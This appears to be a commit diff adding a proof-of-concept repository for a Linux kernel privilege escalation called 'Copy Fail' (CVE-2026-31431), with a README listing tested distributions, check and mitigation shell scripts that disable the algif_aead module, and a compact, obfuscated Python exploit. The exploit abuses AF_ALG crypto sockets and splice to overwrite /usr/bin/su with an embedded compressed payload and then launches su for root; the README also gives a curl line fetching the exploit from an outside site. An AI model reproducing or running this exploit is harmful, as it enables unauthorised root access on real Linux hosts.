Added code and mitigation and checks

README.md

@@ -0,0 +1,25 @@
+# Copy Fail - CVE-2026-31431
+
+[Technical Writeup](https://xint.io/blog/copy-fail-linux-distributions)
+
+## Tested Distro / Version
+
+|    Distro   |    Version       |
+|-------------------|-------------------------|
+| Ubuntu 24.04 LTS  | 6.17.0-1007-aws         |
+| Amazon Linux 2023 | 6.18.8-9.213.amzn2023   |
+| RHEL 10.1         | 6.12.0-124.45.1.el10_1  |
+| SUSE 16           | 6.12.0-160000.9-default |
+| Rocky Linux 9.7 (Blue Onyx) |  5.14.0-611.49.1.el9_7.x86_64 |
+
+
+## Files
+check.sh - makes a check to see if the exploitable crypto module is loaded.
+mitigate.sh - unloads the exploitable crypto module, chances are you didnt need it anyway.
+
+copy_fail_exp.py - the exploit in pure python.
+
+
+run to get the file as a non-privilaged user.
+
+ curl https://copy.fail/exp 

check.sh

@@ -0,0 +1,2 @@
+lsmod | grep algif_aead 
+cat /etc/modprobe.d/disable-algif.conf

copy_fail_exp.py

@@ -0,0 +1,10 @@
+#!/usr/bin/env python3
+import os as g,zlib,socket as s
+def d(x):return bytes.fromhex(x)
+def c(f,t,c):
+ a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
+ try:u.recv(8+t)
+ except:0
+f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
+while i<len(e):c(f,i,e[i:i+4]);i+=4
+g.system("su")

mitigate.sh

@@ -0,0 +1,5 @@
+echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
+rmmod algif_aead 2>/dev/null || true
+
+lsmod | grep algif_aead 
+cat /etc/modprobe.d/disable-algif.conf